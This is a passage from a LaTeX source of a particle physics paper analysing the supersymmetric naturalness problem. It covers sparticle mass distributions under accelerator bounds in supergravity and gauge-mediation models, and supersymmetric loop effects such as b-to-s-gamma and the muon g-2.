the various one-loop corrections to the effective potential
(that double the size of the allowed parameter space).
In our example we have used a small value of the top quark Yukawa coupling at the unification scale,
$\lambda_t(M_{\rm GUT})\approx 0.45$, not close to its infrared fixed point
but compatible with the measured top mass.
In this way the large RGE corrections to the higgs masses are minimized.
This directly alleviates the naturalness problem;
moreover, since the $B$ term is only generated radiatively,
we also get a moderately large value of $\tan\beta\sim20$
that indirectly further alleviates the naturalness problem.
As a consequence the fine tuning corresponding to this example is $\Delta=6$,
the lowest possible value in unified supergravity and gauge mediation models.
In the next section we will study the naturalness problem in these motivated models.
To be conservative, up to section~\ref{effects} we will use only accelerator bounds, and we will not impose
the constraint on the $b\to s\gamma$ decay (and on other loop effects).
\begin{figure*}[t]
\begin{center}
\begin{picture}(17.7,5)
\putps(-0.5,0)(-0.5,0){scatter}{fMassePallini.ps}
\put(2.7,5.3){$\ref{fig:MassePallini}a$}
\put(8.5,5.3){$\ref{fig:MassePallini}b$}
\put(14.3,5.3){$\ref{fig:MassePallini}c$}
\end{picture}
\caption[SP]{\em Scatter plot with sampling density proportional to
the naturalness probability.
The area shaded in \Orange light gray\special{color cmyk 0 0 0 1.}{} (\Peach dark gray\special{color cmyk 0 0 0 1.}) in fig.s~\ref{fig:MassePallini}a,b
correspond to regions
of each plane excluded at LEP2 (at LEP1), while
the area shaded in \Orange light gray\special{color cmyk 0 0 0 1.}{} in fig.~\ref{fig:MassePallini}c has been
excluded at Tevatron.
The \special{color cmyk 0 1. 1. 0.2} dark gray\special{color cmyk 0 0 0 1.}{} (black) points correspond to sampling spectra excluded at LEP2 (at LEP1).
Only the \Green light gray\special{color cmyk 0 0 0 1.}{} points in the unshaded area satisfy all the accelerator bounds.
Points with unbroken electroweak symmetry are not included in this analysis.
\label{fig:MassePallini}}
\end{center}\end{figure*}
\begin{figure*}[t]
\begin{center}
\begin{picture}(17,7.5)
\putps(0,0)(-2.5,0){MasseCampane}{fMasseCampane.ps}
\end{picture}
\caption[SP]{\em Naturalness distribution of sparticle masses
in minimal supergravity.
Allowed spectra contribute only with the small tails in \Green dark gray\special{color cmyk 0 0 0 1.}.
The remaining 95\% of the various bell-shaped distributions is given by points
excluded at LEP2 (in \special{color cmyk 0 1. 1. 0.2} medium gray\special{color cmyk 0 0 0 1.}) or at LEP1 (in \Orange light gray\special{color cmyk 0 0 0 1.}).
On the vertical axes on each plot the particle masses in GeV are reported
($\tan\beta$ in the first plot).
With `squark' and `slepton' me mean the lightest squark and slepton excluding the
third generation ones, that have weaker accelerator bounds.
\label{fig:MasseCampane}}
\end{center}\end{figure*}
\section{The supersymmetric naturalness problem}\label{masses}
In this section we discuss how serious is the supersymmetric naturalness problem
in the various different motivated scenarios of supersymmetry breaking.
We will not consider models with extra fields at low energy beyond the minimal ones present in the MSSM
and we will assume that `matter parity' (equivalent to $R$ parity) is conserved.
In all this section {\em we will consider as excluded only those spectra that violate the experimental
bounds coming from direct searches\/} at accelerators listed in appendix A.
We do not impose cosmological bounds (the addition of tiny $R$ parity violating couplings allows to remove
eventual problems of dark matter overabundance or of nucleosynthesis destruction);
we do not impose that the physical vacuum be the only (or the deepest) one~\cite{CCB,CCBcosm}
depending on cosmology the presence of extra unphysical minima can be or cannot be dangerous ---
within conventional cosmology (i.e.\ sufficiently hot universe, inflation)
the most frequent unphysical minima seem not dangerous~\cite{CCBcosm});
we do not impose $b/\tau$ unification or closeness of $\lambda_t$ to its infra-red fixed point
(these appealing assumptions give problems~\cite{CEP2,b/tau}
that can be alleviated by modifying the theory at very high energy or
by loop corrections at the electroweak scale);
and in this section we also do not impose any indirect bound
(because we want to be conservative and include only completely safe bounds ---
the indirect constraint from $\mathop{\rm BR}(B\to X_s \gamma)$ would exclude 20\% of the otherwise allowed points).
We are thus excluding spectra that are really excluded.
\subsection{Minimal supergravity}
``Minimal supergravity'' assumes that
all the sfermion mas\-ses have a common value $m_0$,
all the three gaugino masses have a common value $M_5$, and that
all the $A$-terms have a common value $A_0$
at the unification scale
$M_{\rm GUT}\approx2\cdot10^{16}\,{\rm GeV}$.
The parameters $\mu_0$ and $B_0$ are free.
They contribute to the mass terms of the higgs doublets
$h^{\rm u}$ and $h^{\rm d}$ in the following way:
$$
(m_{h^{\rm u}}^2+|\mu_0^2|)|h^{\rm u}|^2 +
(m_{h^{\rm d}}^2+|\mu_0^2|) |h^{\rm d}|^2+
(\mu_0 B_0 h^{\rm u} h^{\rm d}+\hbox{h.c.}).$$
As explained in the previous section we randomly fix the dimensionless ratios
of the parameters $m_0$, $M_5$, $A_0$, $B_0$ and $\mu_0$
and we fix the overall supersymmetric
mass scale ``$m_{\rm SUSY}$'' from the minimization condition of the MSSM potential.
More precisely we scan the parameters
within the following ranges
\begin{eqnsystem}{sys:range}
m_0&=&(\frac{1}{9}\div 3) m_{\rm SUSY}\label{eq:m0}\\
|\mu_0|,M_5&=&(\frac{1}{3}\div 3) m_{\rm SUSY}\label{eq:mu}\\
A_0,B_0&=&(-3\div 3) m_0
\end{eqnsystem}
The samplings in\eq{m0},\eq{mu} are done with flat density in logarithmic scale.
We think to have chosen a reasonable restriction on the parameter space.
We could make the naturalness problem apparently more dramatic
by restricting the dimensionless ratios to a narrow region
that does not include some significant part of the experimentally allowed region,
or by extending the range to include larger values that produce a larger spread
in the spectrum so that it is more difficult to satisfy all the experimental bounds.
The only way to make the naturalness problem less dramatic is by imposing
appropriate correlations among the parameters, but this makes sense only if a theoretical justification can be found
for these relations.We will comment about this possibility in the conclusions.
An alternative scanning procedure that does not restrict at all the parameter space
$$m_0,|\mu_0|,M_5,B_0,|A_0|=(0\div 1)m_{\rm SUSY}.$$
gives the same final results as in~(\ref{sys:range}).
\smallskip
We now exhibit the results of this analysis in a series of figures.
In fig.s~\ref{fig:MassePallini} we show some scatter plots
with sampling density proportional to the naturalness probability.
The sampling points that give spectra excluded at LEP1 are drawn in black,
the points excluded at LEP2 in \special{color cmyk 0 1. 1. 0.2} medium gray\special{color cmyk 0 0 0 1.}{},
and the still allowed points are drawn in \Green light gray\special{color cmyk 0 0 0 1.}{}.
The present bounds are listed in appendix~A.
The pre-LEP2 bounds approximately consist in requiring that
all charged and coloured particles be heavier than $M_Z/2$.
Fig.~\ref{fig:MassePallini}a shows the correlation between the masses of the
lightest chargino, $m_\chi$,
and of the lightest higgs, $m_h$.
This plot shows that the experimental bounds on $m_\chi$ and $m_h$
are the only important ones in minimal supergravity
(if $m_0\ll M_5$ also the bound on the mass of right-handed sleptons becomes relevant).
The bound on the chargino mass is more important than the one on the higgs mass:
even omitting the bound on the higgs mass
the number of allowed points would not be significantly increased
(the MSSM predicts a light higgs;
but this prediction can be relaxed by adding of a singlet field to the MSSM spectrum).
The experimental bounds on supersymmetry are thus very significant
(to appreciate this fact one must notice that the allowed points have small density).
This fact is maybe illustrated in a more explicit way in
fig.~\ref{fig:MassePallini}b, where we show the correlation
between the masses of the lightest chargino, $M_\chi$,
and of the lightest neutralino, $M_N$.
We see that in the few points where LEP2 bound on the chargino mass is satisfied,
the two masses $M_N\approx M_1$ and $M_\chi\approx M_2$
are strongly correlated
because the $\mu$ parameter is so large that the
$\SU(2)_L$-breaking terms in the gaugino mass matrices become irrelevant.
We clearly appreciate how strong has been the improvement done at LEP2.
In fig.~\ref{fig:MassePallini}c we show an analogous plot in the
$(M_3,m_{\tilde{q}})$ plane, often used to show bounds from hadronic accelerators.
The bounds from LEP2 experiments together with the assumption of mass universality at the unification scale
gives constraints on the mass of coloured particles stronger than the direct bounds from Tevatron experiments
In fig.s~\ref{fig:MasseCampane} we show the same kind of results using a different
format.
We show the `naturalness distribution probability' for the masses of various representative
supersymmetric particles and for $\tan\beta$.
The allowed points have been drawn in \Green dark gray\special{color cmyk 0 0 0 1.};
those ones excluded at LEP2 (LEP1) in
in \special{color cmyk 0 1. 1. 0.2} medium gray\special{color cmyk 0 0 0 1.}{} (in \Orange light gray\special{color cmyk 0 0 0 1.}).
As a consequence of the naturalness problem the allowed spectrum is confined in fig.s~\ref{fig:MasseCampane}to
the small tails in the upper part of the unconstrained probability distributions.
The fact that LEP1 experiments have not found a chargino lighter than $M_Z/2$
excluded about $70\%$ of the unified supergravity parameter space.
In the MSSM with soft terms mediated by `minimal supergravity'
the present experimental bounds exclude $95\%$
of the parameter space with broken electroweak symmetry
($97\%$ if we had neglected one-loop corrections to the potential).
\subsection{Non minimal supergravity}
Some of the assumptions of the `minimal supergravity scenario' allow to reduce the number of parameters,
but do not have a solid theoretical justification.
`Minimal supergravity' at the Planck (or string) scale can be justified: but even in this case
the mass spectrum at the unification scale
is expected to be significantly different
from the minimal one due to renormalization effects~\cite{RGEGUT}.
If the theory above the gauge unification scale is a unified theory,
these renormalization effects induce new flavour and CP violating processes~\cite{HKR,FVGUT},
that we will discuss in section~\ref{sflavour}.
In this section we study the naturalness problem in
`unified supergravity', that we consider an interesting and predictive scenario.
More precisely, beyond performing the scanning~(\ref{sys:range}), we also
allow the higgs mass parameters at the unification scale to vary in the range
$$m_{h^{\rm u}},m_{h^{\rm d}}=(\frac{1}{3}\div 3) m_0$$
where $m_0$ is now the mass of the sfermions contained in the $10_3=((t_L,b_L),t_R,\tau_R)$ multiplet of SU(5).
We can assume that all remaining sfermions have the same mass $m_{0}$, since
they do not play any significant role in the determination of $M_Z^2$
(unless they are very heavy; we do not consider this case in this section).
From the point of view of the naturalness problem there is no
significant difference between minimal and unified supergravity:
an unnatural cancellation remains necessary even if there are more parameters.
From the point of view of phenomenology, maybe the most interesting
new possibility is that a mainly right handed stop
can `accidentally' become significantly lighter than the other squarks.
Unless the top $A$-term is very large, this accidental cancellation is possible only if~\cite{lightStop}
$$m_{10_3}^2/m_{h_{\rm u}}^2\approx (0.6\div0.8)\qquad\hbox{and}\qquad M_2\circa{<}0.2|m_{h_{\rm u}}|$$
(all parameters renormalized at $M_{\rm GUT}$) ---
a region of the parameter space where the small mass $M_2$ term for the chargino
makes the naturalness problem stronger.
The large Yukawa coupling of a light stop can generate various interesting loop effects
($b\to s\gamma$, $\Delta m_B$, $\varepsilon_K$)
and make the electroweak phase transition sufficiently first-order
so that a complex $\mu$ term can induce baryogenesis~\cite{EWbaryogenesis}.
However this possibility is severely limited by naturalness considerations~\cite{lightStop}:
it requires not only that one numerical accident makes the $Z$ boson
sufficiently lighter than the unobserved chargino,
but also that a second independent numerical accident gives a stop lighter than the other squarks.
The fact that in our analysis this combination occurs very rarely ($p\sim10^{-3}$)
means that this nice possibility is very unnatural.
Furthermore a stop lighter than $200\,{\rm GeV}$ is strongly correlated with
a too large supersymmetric correction to the $\mathop{\rm BR}(B\to X_s \gamma)$ decay.
\smallskip
In fig.~\ref{fig:MultiCampana} we show the naturalness distribution of sparticle masses
omitting all the experimentally excluded spectra, i.e.\ under the assumption
that supersymmetry has escaped detection because a numerical
accident makes the sparticle too heavy for LEP2.
In the more realistic `unified supergravity' scenario,
these distributions correspond to the `allowed tails'
of the full distributions plotted in fig.s~\ref{fig:MasseCampane}.
Since the allowed spectra come from a small region of the parameter space,
their naturalness distribution probability has a less significant
dependence on the choice of the scanning procedure.
It is possible to define the most likely range of values of the masses of
the various sparticles, for example by excluding the first $10\%$ and the last $10\%$
of the various distributions.
These $(10\div 90)\%$ mass ranges are shown in table~\ref{tab:campane}.
We see that, once one accepts the presence of a numerical accident,
it is not extremely unlikely that it is so strong that coloured particles are heavier than few TeV
(even for so heavy sparticles, a stable neutralino is not necessarily dangerous for cosmology).
Nevertheless there is still a very good probability that supersymmetry can be detected at LHC .
In section~\ref{effects} we will use these naturalness probability distributions for
sparticle masses to compute the natural values of various interesting loop effects mediated by
the sparticles, that could be discovered before LHC.
\medskip
\begin{figure*}[t]
\begin{center}
\begin{picture}(17.5,4)
\putps(0,0)(0,0){MultiCampane}{fMultiCampane.ps}
\end{picture}
\caption[SP]{\em Naturalness distribution of some illustrative supersymmetric
particle masses (on the horizontal axis) in unified supergravity,
under the hypothesis that supersymmetry has not be found at LEP2 due
to a numerical accident.
The three {\special{color cmyk 1. 1. 0.3 0} continuous lines\special{color cmyk 0 0 0 1.}} are the three gauginos
($M_N$, $M_\chi$ and $M_{\tilde{g}}$ from left to right).
The {\Cyan thin dashed line\special{color cmyk 0 0 0 1.}} is the lightest slepton and
the {\special{color cmyk 0 1. 1. 0.5} thick dashed lines\special{color cmyk 0 0 0 1.}} are the lightest stop (left) and squark (right).
The {\Purple dotted lines\special{color cmyk 0 0 0 1.}} are the light and charged higgs.
The distribution of $\tan\beta$ is not shown because similar to the one in fig.~\ref{fig:MasseCampane}.
\label{fig:MultiCampana}}
\end{center}\end{figure*}
Before concluding this section, we recall that the bounds on the gluino
mass from Tevatron experiments are not competitive with the LEP2 bounds on the chargino mass,
if gaugino mass universality is assumed.
Consequently it is possible to alleviate the naturalness problem of supersymmetry
by abandoning gaugino mass universality
and making the gluino pole mass as light as possible, $M_3\sim (200\div250)\,{\rm GeV}$
(in supergravity this requires a small gluino mass, $M_3(M_{\rm GUT})\sim100\,{\rm GeV}$, at the unification scale;
an analogous possibility in gauge-mediation requires a non unified spectrum of messengers).
In this case the sparticle spectrum is very different from the one typical of all conventional models;
consequently the loop effects mediated by coloured sparticles are larger.
Even if in this case the minimal FT can be reduced even down to ${\cal O}} \def\SU{{\rm SU}(1)$ values,
we do not find this solution completely satisfactory.
If we treat all the gaugino and sfermion masses as free parameters of order $M_Z$,
the SM $Z$ boson mass is still one (combination) of them and still there is no reason,
different from an unwelcome accident,
that explains why $M_Z$ is roughly the smallest of all the $\sim10$ charged and coloured soft masses.
Anyway, Tevatron can concretely explore this possibility in the next years.
\begin{table}[b]
\begin{center}
$$\begin{array}{|c|c|}\hline
\chbox{supersymmetric}&\chbox{mass range}\\
\chbox{particle}&\chbox{(in GeV)}\\ \hline
\hbox{lighest neutralino} & ~55 \div 250\\
\hbox{lighest chargino} & ~110 \div 500\\
\hbox{gluino} & ~400\div1700\\
\hbox{slepton} & ~105\div 600\\
\hbox{squark} & ~400\div 1700\\
\hbox{stop} & ~250 \div 1200\\
\hbox{charged higgs} &~300\div 1200\\ \hline
\end{array}$$
\caption[SP]{\em $(10\div90)\%$ naturalness
ranges for the masses of various supersymmetric particle,
in unified supergravity,
assuming that the naturalness problem is caused by an accidental cancellation.
\label{tab:campane}}
\end{center}\end{table}
\begin{figure*}[t]
\begin{center}
\begin{picture}(15,7)
\putps(0,0)(0,0){GMFTneg}{fGMFTneg.ps}
\putps(8,0)(8,0){GMFTpos}{fGMFTpos.ps}
\put(2,-0.3){Messenger mass $M_{\rm GM}$}
\put(10,-0.3){Messenger mass $M_{\rm GM}$}
\put(-0.5,3.8){$\eta$}
\put(7.5,3.8){$\eta$}
\put(3.3,7){$\mu<0$}
\put(11.5,7){$\mu>0$}
\end{picture}
\vspace{5mm}
\caption[SP]{\em Contour plot of the fine-tuning parameter $\Delta$ in gauge mediation models
in the plane $(M_{\rm GM},\eta)$ for $\mu<0$ (left)
and $\mu>0$ (right).
In the (\special{color cmyk 0 1. 1. 0.5} dark gray\special{color cmyk 0 0 0 1.}, white, \Green light gray\special{color cmyk 0 0 0 1.}) area at the (left, center, right)
of each picture the strongest experimental constraint is the one on the mass of the lightest
(neutralino, right handed slepton, chargino).
Values of $\eta$ in the gray area below the lower dashed lines and above the upper dashed lines
are not allowed in models with only one SUSY-breaking singlet.
\label{fig:GMFT}}
\end{center}\end{figure*}
\subsection{Gauge mediation}
`Gauge mediation' models contain some charged `messenger' superfields
with some unknown mass $M_{\rm GM}=(10^5\div10^{15})\,{\rm GeV}$
directly coupled to a gauge singlet field with supersymmetry-breaking vacuum expectation value.
The `messengers' mediate supersymmetry-breaking terms to the MSSM
sparticles that feel gauge interactions~\cite{GaugeSoft,Review}.
The spectrum of the supersymmetric particles
is thus mainly determined by their gauge charges.
More precisely, in a large class of minimal models
(from the first toy ones to the more elaborated recent ones)
the prediction for the soft terms, renormalized at the messenger mass $M_{\rm GM}$, can be
conveniently parametrized as
\begin{eqnsystem}{sys:GM}
M_i(M_{\rm GM})&=& \frac{\alpha_i(M_{\rm GM})}{4\pi} M_0,\\
m_R^2(M_{\rm GM}) &=& \eta\cdot c^i_R M_i^2(M_{\rm GM}),
\end{eqnsystem}
where
$m_R$ are the soft mass terms for the fields
$$R=\tilde{Q},\tilde{u}_R,\tilde{d}_R,\tilde{e}_R,
\tilde{L},h^{\rm u},h^{\rm d},$$
and the various quadratic Casimir coefficients $c^i_R$ are listed, for example, in ref.~\cite{GMFT}.
Here $M_0$ is an overall mass scale and $\eta$
parametrizes the different minimal models.
For example $\eta=(n_5+3n_{10})^{-1/2}\le 1$ in models
where a single gauge singlet couples supersymmetry breaking
to $n_5$ copies of messenger fields in the $5\oplus\bar5$
representation of SU(5)
and to $n_{10}$ copies in the $10\oplus\overline{10}$
representation~\cite{GaugeSoft,Review}.
Values of $\eta$ bigger than one are possible
if more than one supersymmetry-breaking singlet is present~\cite{GaugeSoft,Review}.
If the messengers are as light as possible the sparticle spectrum become a bit different
than the one in~(\ref{sys:GM})
(but we will argue in the following that this case is very unnatural).
Gauge-mediation models have the problem that
gauge interactions alone cannot mediate
the `$\mu$-term',
as well as the corresponding `$B\cdot \mu$-term',
since these terms break a Peccei-Quinn symmetry.
The unknown physics
required to solve this problem
may easily give rise to unknown non minimal
contributions to the soft terms in the Higgs sector~\cite{Review},
but this lack of predictivity does not prevent the study of naturalness.
Like in supergravity models, the one loop corrections to the potential are very important.
In gauge mediation models the minimal fine tuning is higher than
in supergravity models~\cite{GMFT,Rom}
because gauge mediation generates a right handed
selectron mass significantly smaller than the higgs mass term which sets the scale of electroweak symmetry breaking.
This effect is more pronounced for intermediate values of the mediation scale, $M_{\rm GM}\sim 10^{8}\,{\rm GeV}$.
Higher values of the mediation scale give spectra of sparticles more similar to supergravity case,
that have a less strong naturalness problem
(but if $M_{\rm GM}\circa{>}10^{12}\,{\rm GeV}$ it is necessary to complicate the theory
to avoid destruction of nucleosynthesis~\cite{Review}).
If the mediation scale is as light as possible the RGE effects between $M_{\rm GM}$ and $M_Z$ are smaller,
reducing the fine-tuning.
However for low values of the messenger mass, $M_{\rm GM}\circa{<}10^{7\div 8}\,{\rm GeV}$,
the neutralino decays within the detector, so that LEP2 experiments give now
a {\em very strong\/} bound on its mass: $m_N>91\,{\rm GeV}$
(if $\eta\circa{<}0.5$ the experimental bounds can be less stringent because
a slepton could be lighter than the neutralinos).
The consequent strong naturalness problem makes the light messenger scenario not attractive;
Values of the gauge mediation scale higher than $M_{\rm GM}\circa{>}10^9\,{\rm GeV}$ are instead less attractive
from the point of view of cosmology~\cite{OmegaGravitino}.
In fig.~\ref{fig:GMFT} we show contour plots of the fine tuning required by gauge mediation models,
in the plane ($M_{\rm GM},\eta$) for $\tan\beta=2.5$ and $M_t^{\rm pole}=175\,{\rm GeV}$
(this corresponds to $\lambda_t(M_{\rm GUT})\approx 0.5$, taking into account
threshold corrections to $\lambda_t$;
the FT is somewhat higher if one uses larger allowed values of $\lambda_t(M_{\rm GUT})$),
where $M_{\rm GM}$ is the messenger mass, while $\eta$
parametrizes the different models, as defined in~(\ref{sys:GM}).
The fine tuning is computed according to the definition in~\cite{GMFT}, including
one loop effects and all recent bounds.
In these figures we have shaded in \Green medium gray\special{color cmyk 0 0 0 1.}{} the regions at high values of the messenger mass
where the bound on the chargino mass is the strongest one and the fine-tuning is not higher than
in supergravity models.
We have shaded in \special{color cmyk 0 1. 1. 0.5} dark gray\special{color cmyk 0 0 0 1.}{} the regions at small values of the messenger mass
where the very strong new bound on the neutralino mass makes the model unattractive.
We have not coloured the remaining region where
the bound on the right handed slepton masses is the strongest one and makes
the fine tuning higher than in supergravity models.
Small ($\eta\circa{<}0.4$) and big ($\eta>1$) values of $\eta$ (below and above the dashed lines)
are only allowed in models
where more than one singlet field couples supersymmetry breaking to the messenger fields.
The fine tuning strongly increases for smaller values of $\tan\beta$,
and becomes a bit lower for higher values of $\tan\beta$.
The choice of parameters used in the example shown in fig.~\ref{fig:example}
corresponds to one of the most natural cases.
As indicated by fig.~\ref{fig:GMFT}, extremely light messengers ($M_{\rm GM}\approx 10\,{\rm TeV}$)
could give rise to a more natural sparticle spectrum
(with detectably non-unified gaugino masses~\cite{GMNLOlowM});
we have not studied this possibility because NLO corrections~\cite{GMNLOlowM,GMNLO},
that depend on unknown couplings between messengers, become relevant in this limiting case.
\begin{figure*}
\begin{center}
\begin{picture}(17.5,5)
\putps(0,0)(-0.5,0){bsg}{fbsg.ps}
\put(3.2,5.5){$\ref{fig:bsg}a$}
\put(9,5.5){$\ref{fig:bsg}b$}
\put(14.8,5.5){$\ref{fig:bsg}c$}
\end{picture}
\caption[SP]{\em Naturalness distribution of three possibly interesting `minimal' supersymmetric effects
($\mathop{\rm BR}(B\to X_s\gamma)_{\rm MSSM}/\mathop{\rm BR}(B\to X_s\gamma)_{\rm SM}$ in fig.~\ref{fig:bsg}a,
anomalous magnetic moment of the muon $a_\mu$ in fig.~\ref{fig:bsg}b
and $\Delta m_B^{\rm SUSY}/\Delta m_B$ in fig.~\ref{fig:bsg}c)
in unified supergravity with degenerate sfermions. We have plotted
in {\Purple light gray\special{color cmyk 0 0 0 1.}} the contributions from spectra where at least one of these loop effects is too large,
in {\special{color cmyk 1. 1. 0.3 0} medium gray\special{color cmyk 0 0 0 1.}} the ones where at least one of these loop effects is detectable,
and in black the ones where all effects seem too small.
Our boundaries between excluded/detectable/too small effects are represented by the
horizontal lines.
\label{fig:bsg}}
\end{center}\end{figure*}
\section{Supersymmetric loop effects}\label{effects}
Assuming that the supersymmetric naturalness problem is caused by a numerical accident,
we now study the natural values of various supersymmetric loop effects,
hopefully detectable in experiments at energies below the supersymmetric scale.
As discussed before, since the allowed parameter space is very small,
we can safely compute naturalness distributions in any given model.
As before we concentrate our analysis on unified supergravity
and, for simplicity, we assume that the sfermions of each given generation have
a common soft mass and a common $A$ term at the the unification scale.
In a first subsection we assume a complete degeneration of all the sfermions at the the unification scale.
In this case the CKM matrix is the only source of flavour and CP violation
(possible complex phases in the supersymmetric parameters --- not discussed here ---
would manifest at low energy mainly as electric dipoles).
The supersymmetric corrections to loop effects already present in the SM are studied in
this first subsection.
In the second subsection we will assume
(as suggested by unification of gauge couplings and by the heaviness of the top quark~\cite{HKR,FVGUT})
that the sfermions of third generation are non degenerate with the other ones.
In this case the MSSM Lagrangian contains new terms that violate leptonic flavour, hadronic flavour and CP
and that can manifest in a variety of ways.
These effects depend in a significant way not only on the masses of the sparticles,
but also on unknown parameters not constrained by naturalness.
We will thus compute them only in particular motivated models.
\subsection{Minimal effects}\label{MinimalEffects}
In cases where electroweak loop corrections give observable effects to some measurable quantities
supersymmetry can give additional loop corrections comparable to the SM ones.
None of these corrections have been seen in the electroweak precision measurements done mostly at LEP.
However more powerful tests of this kind will be provided by more precise measurement and
more precise SM predictions of some `rare' processes in
$B$ physics ($b\to s\gamma$, $b\to s\ell^+\ell^-$, $\Delta m_B$),
$K$ physics ($\varepsilon_K$, $K\to \pi\nu\bar{\nu}$)
and of the anomalous magnetic moment of the muon, $a_\mu\equiv(g-2)_\mu/2$\footnote{We have carefully computed
the supersymmetric corrections to $b\to s\gamma$
(assuming an experimental cutoff $E_\gamma > 70\% E_\gamma^{\rm max}$ on the photon energy)
including all relevant NLO QCD corrections in this way:
The SM value have been computed as in~\cite{KN}.
The charged Higgs contribution is computed including only the relevant NLO terms as in the first reference in~\cite{C7HNLO}
(the other two references in~\cite{C7HNLO} include all the remaining terms requested by a formal NLO expansion,
that at most affect $\mathop{\rm BR}(B\to X_s\gamma)$ at the $1\%$ level).
The NLO corrections to the chargino/stop contribution are taken from~\cite{CchiNLO},
again omitting the negligible NLO corrections to the $b\to sg$ chromo-magnetic penguin.
Unfortunately the approximation used in~\cite{CchiNLO} is not
entirely satisfactory: the chargino/squark corrections to the $b\to s\gamma$ rate
can be large even without a lighter stop with small mixing,
as assumed in~\cite{CchiNLO} to simplify the very complex computation.
Finally, we have included the threshold part of the two-loop ${\cal O}} \def\SU{{\rm SU}(\lambda_t^2)$ corrections
that does not decouple in the limit of heavy supersymmetric particles.
We have computed $a_\mu$ using the formul\ae{} given in~\cite{gMuSUSY}.
The supersymmetric correction to $\Delta m_B$ have been taken from~\cite{BBMR}.}.
Notwithstanding the stringent constraints on the sparticle masses,
in some particular region of the unified supergravity parameter space,
{\em all\/} these supersymmetric corrections can still be significant~\cite{okada}.
We study how natural are these regions where the effects are maximal.
In fig.~\ref{fig:bsg} we show the naturalness distribution probabilities for these effects.
We have drawn
in {\Purple light gray\special{color cmyk 0 0 0 1.}} the contributions from spectra where one (or more) supersymmetric loop effect is too large;
in {\special{color cmyk 1. 1. 0.3 0} medium gray\special{color cmyk 0 0 0 1.}} the contributions from spectra where one (or more) effect is detectable in planned experiments,
and in black the contributions from spectra for which all effects are too small.
Requiring a $\sim95\%$ confidence level for considering excluded or discovered an effect,
we divide the possible supersymmetric effects into `excluded', `discoverable', or `too small'
according the following criteria.
We consider allowed a value of
$R=\mathop{\rm BR}(B\to X_s\gamma)_{\rm MSSM}/\mathop{\rm BR}(B\to X_s\gamma)_{\rm SM}$
(where the MSSM value includes SM and sparticle contributions)
in the range $0.6<R<1.5$, and we consider discoverable a correction to $R$ larger than $20\%$.
The present experimental uncertainty on $10^{10} a_\mu$ is $\pm 84$~\cite{pdg} and
will be reduced maybe even below the $\pm4$ level~\cite{brook}.
It seems possible to reduce the present QCD uncertainty in the SM prediction to the same level~\cite{QCDg-2}.
In our plot we consider detectable a supersymmetric correction to $a_\mu$ larger than $10^{-9}$.
It is easy to imagine how fig.~\ref{fig:bsg} would change with more or less prudent estimates.
\smallskip
The results are the following.
Fig.~\ref{fig:bsg} shows that {\em $b\to s\gamma$ is a very promising candidate for a discoverable effect\/}.
More precisely supersymmetry gives a correction to $\mathop{\rm BR}(B\to X_s\gamma)$ larger than $20\%$
in about $40\%$ of the allowed sampling spectra.
A supersymmetric correction to the $b\to s\gamma$ magnetic penguin also manifests
as a distortion of the spectrum of the leptons in the decay $b\to s\ell^+\ell^-$.
{\em A detectable supersymmetric effect in the $g-2$ of the muon is less likely but not impossible}.
About $10\%$ of the sampled spectra are accompanied by a discoverably large effect in $g-2$
without a too large correction to $b\to s\gamma$.
On the contrary a detectable (i.e.\ $\circa{>}30\%$) supersymmetric correction to $B$ mixing
(shown in fig.~\ref{fig:bsg}c) and to $K$ mixing
(not shown because linearly correlated to the effect in $B$ mixing)
can only be obtained for values of the parameters~\cite{okada} strongly
disfavoured by our naturalness considerations.
The same conclusion holds for $K\to\pi\nu\bar{\nu}$ decays.
An enhancement of the effects is possible in two particular situations:
if $\tan\beta$ is large, or if a stop state is lighter than $\sim200\,{\rm GeV}$.
Both these situation can be realized --- but only for
particular values of the parameters --- in the `unified supergravity' scenario
in which we are doing our computations.
As discussed in the previous section, a so light stop is decidedly not a natural expectation.
The possibility of a large $\tan\beta$ is instead a weak aspect of our analysis.
If the scalar masses are larger than all the other soft terms ($A$, $B$, $\mu$ and gaugino masses)
a large $\tan\beta$ is naturally obtained~\cite{largetanBeta}.
In our scanning of the parameter space we have preferred to assume that the $A$ terms are of the same order
of the scalar masses, and we have thus not covered this possibility.
We do not explore the possibility of large $\tan\beta$ in this article
because
a large $\tan\beta$ would enhance the one loop effects that are already
more ($b\to s\gamma$) or less ($a_\mu$) promising,
but not the effects that seem uninteresting.
\begin{figure*}[t]
\begin{center}
\begin{picture}(18,5)
\putps(0,0)(0,0){fitSiEps}{fitSiEps.ps}
\putps(6,0)(6,0){fitNoEps}{fitNoEps.ps}
\putps(12,0)(12,0){fitCompat}{fitCompat.ps}
\put(2.5,5.5){$\ref{fig:fit}a$}
\put(8.75,5.5){$\ref{fig:fit}b$}
\put(15,5.5){$\ref{fig:fit}c$}
\end{picture}
\caption[SP]{\em
In fig.s~\ref{fig:fit}a,b we show the `best fit' values of the plane ($\rho,\eta$).
In fig.~\ref{fig:fit}a we include all data in the fit, while in
fig.~\ref{fig:fit}b we omit $\varepsilon_K$.
In fig.~\ref{fig:fit}c we include all data except $\varepsilon_K$,
and we study the
compatibility between theory and experiments of each given value of $\rho$ and $\eta$.
In all cases the contour levels correspond to $68\%$, $95\%$ and $99\%$ C.L.
\label{fig:fit}}
\end{center}\end{figure*}
\begin{figure*}[t]
\begin{center}
\begin{picture}(15.5,7)
\putps(0,0)(-4,0){LHFV}{fLHFV.ps}
\end{picture}
\caption[SP]{\em
Naturalness distribution of various possibly interesting `non minimal' supersymmetric effects
(in the upper row, from left to right: $\mathop{\rm BR}(\mu\to e\gamma)$, $|d_e|/(e\cdot{\rm cm})$,
$|\varphi_{B_d}^{\rm SUSY}|\equiv
|\arg(\Delta m_{B_d}/\Delta m_{B_d}^{\rm SM})|$,
direct CP asymmetry in $b\to s\gamma$;
in the lower row:
supersymmetric correction to the CP asymmetry in the $B_d\to \phi K_S$ decay,
to $d_N/(e\cdot{\rm cm})$, to $\varepsilon_K$, to the mixing induced CP asymmetry in $b\to s\gamma$)
in unified supergravity with $\eta_f=0.5$
(all assumptions are listed in the text).
The vertical axes contain the values of the loop effects.
The {\Purple light gray\special{color cmyk 0 0 0 1.}} part of the distributions comes from spectra where one
of the loop effects is too large,
the {\special{color cmyk 1. 1. 0.3 0} medium gray\special{color cmyk 0 0 0 1.}} part from spectra accompanied by a discoverable effect;
the black part from spectra where all the loop effects are too small.
The horizontal {\special{color cmyk 0 1. 1. 0.5} dashed lines\special{color cmyk 0 0 0 1.}} in each plot delimit
the smallest effect that we estimate detectable
(the continuous lines delimit already excluded affects).
\label{fig:LHFV}}
\end{center}
\end{figure*}
\setcounter{footnote}{0}
\subsection{New supersymmetric effects}\label{sflavour}
